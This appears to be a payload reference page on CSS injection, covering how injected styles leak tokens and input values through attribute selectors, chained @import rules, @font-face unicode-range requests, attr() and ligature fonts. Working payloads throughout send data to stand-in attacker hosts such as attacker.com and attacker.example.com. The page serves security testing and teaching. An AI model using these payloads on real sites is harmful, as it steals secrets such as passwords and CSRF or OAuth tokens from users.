CSS Injection
CSS Injection is a vulnerability that occurs when an application allows untrusted CSS to be injected into a web page. This can be exploited to exfiltrate sensitive data, such as CSRF tokens or other secrets, by manipulating the page layout or triggering network requests based on element attributes.
Summary
Tools
- hackvertor/blind-css-exfiltration - A tool to exfiltrate unknown web pages using Blind CSS.
- PortSwigger/css-exfiltration - Collection of CSS based exfiltration techniques.
- cgvwzq/css-scrollbar-attack - PoC for leaking text nodes via CSS injection using scrollbars.
- d0nutptr/sic - Sequential Import Chaining for advanced CSS exfiltration.
- adrgs/fontleak - Tool for fast exfiltration of text using only CSS and Ligatures.
Methodology
CSS Selectors
CSS selectors can be used to exfiltrate data. This technique is particularly useful because CSS is often allowed in CSP rules, whereas JavaScript is frequently blocked.
The attack works by brute-forcing a token character by character. Once the first character is identified, the payload is updated to guess the second character, and so on. This often requires an iframe to reload the page with the new payload.
input[value^=a](prefix attribute selector): Selects elements where the value starts with "a".input[value$=a](suffix attribute selector): Selects elements where the value ends with "a".input[value*=a](substring attribute selector): Selects elements where the value contains "a".
Exfiltration via Background Image
When a selector matches, the browser attempts to load the background image from a URL controlled by the attacker, thereby leaking the character.
Tips:
- Hidden Inputs: You cannot apply a background image directly to a hidden input field. Instead, use a sibling selector (
+or~) to style a visible element that appears after the hidden input.
- Has Selector: The
:has()pseudo-class allows styling a parent element based on its children.
- Concurrency: Use both prefix and suffix selectors to speed up the guessing process. You can assign the prefix check to one property (e.g.,
background) and the suffix check to another (e.g.,list-style-imageorborder-image).
CSS Import at-rule
This technique is known as Blind CSS Exfiltration. It relies on importing external stylesheets to trigger callbacks.
<style>@import url(http://attacker.com/staging?len=32);</style>
<style>@import'//YOUR-PAYLOAD.oastify.com'</style>
Frames do not always need to be reloaded to reevaluate CSS. The @import rule allows for latency; the browser will process the import and apply the new styles.
Sequential Import Chaining (SIC)
SIC allows an attacker to chain multiple extraction steps without reloading the page:
- Inject an initial
@importrule pointing to a staging payload. - The staging payload holds the connection open (long-polling) while generating the next specific payload.
- When a CSS rule matches (e.g., a character is found via
background-image), the browser makes a request. - The server detects this request and generates the next
@importrule to continue the chain.
CSS Conditionals
Inline Style Exfiltration
This advanced technique leverages CSS conditionals (like if()) and variables to perform logic directly within a style attribute.
Example: Stealing a data-uid attribute if it matches a value between 1 and 10.
<div style='--val: attr(data-uid); --steal: if(style(--val:"1"): url(/1); else: if(style(--val:"2"): url(/2); else: if(style(--val:"3"): url(/3); else: if(style(--val:"4"): url(/4); else: if(style(--val:"5"): url(/5); else: if(style(--val:"6"): url(/6); else: if(style(--val:"7"): url(/7); else: if(style(--val:"8"): url(/8); else: if(style(--val:"9"): url(/9); else: url(/10)))))))))); background: image-set(var(--steal));' data-uid='1'></div>
CSS Font-face at-rule
The @font-face CSS at-rule specifies a custom font with which to display text; the font can be loaded from either a remote server or a locally-installed font on the user's own computer. - Mozilla
The unicode-range property allows specific fonts to be used for specific characters. We can abuse this to detect if a specific character is present on the page.
If the character "A" is present, the browser attempts to load the font from /?A. If "C" is not present, that request is never made.
<style>
@font-face{ font-family:poc; src: url(http://attacker.example.com/?A); /* fetched */ unicode-range:U+0041; }
@font-face{ font-family:poc; src: url(http://attacker.example.com/?B); /* fetched too */ unicode-range:U+0042; }
@font-face{ font-family:poc; src: url(http://attacker.example.com/?C); /* not fetched */ unicode-range:U+0043; }
#sensitive-information{ font-family:poc; }
</style>
<p id="sensitive-information">AB</p>
Limitations:
- It cannot distinguish repeated characters (e.g., "AA" triggers the request once).
- It does not determine the order of characters.
- Despite these limitations, it is a very reliable oracle for checking character existence.
- Chrome checked this as "WontFix": issues/40083029
Attribute Extraction via attr()
The CSS attr() function allows CSS to retrieve the value of an attribute of the selected element. With recent updates (see Advanced attr()), this function can be used to extract input's value.
Target HTML:
<html>
<head>
<link rel="stylesheet" href="http://attacker.local/index.css">
</head>
<body>
<input type="text" name="password" value="supersecret">
</body>
</html>
index.css (hosted by attacker):
When image-set() is used with attr(), the browser may attempt to interpret the attribute value as a URL. If the stylesheet is cross-domain, the relative URL is resolved against the stylesheet's origin, not the page's origin.
Resulting request on attacker's server:
Ligatures
This technique exploits custom fonts and ligatures. A ligature combines multiple characters into a single glyph. By creating a custom font where specific character sequences (e.g., specific text content) produce a ligature with a huge width, we can detect the change in layout.
- Create a custom font with ligatures for target strings.
- Use media queries or scrollbars to detect if the rendered width of the element has changed.
Payload example using fontleak with a custom selector, parent element, and alphabet.
Warning: The CSS selector must match exactly one element in the target page.
<style>@import url("http://localhost:4242/?selector=.secret&parent=head&alphabet=abcdef0123456789");</style>
Labs
References
- 0CTF 2023 Writeups - Web - newdiary - aszx87410 - December 11, 2023
- Bench Press: Leaking Text Nodes with CSS - pspaul - October 20, 2024
- Better Exfiltration via HTML Injection - d0nut - April 11, 2019
- Blind CSS Exfiltration: exfiltrate unknown web pages - Gareth Heyes - December 5, 2023
- CSS based Attack: Abusing unicode-range of @font-face - Masato Kinugawa - October 23, 2015
- CSS Data Exfiltration to Steal OAuth Token - - September 13, 2025
- CSS Injection - xsleaks.dev - May 9, 2025
- CSS Injection Attacks or how to leak content with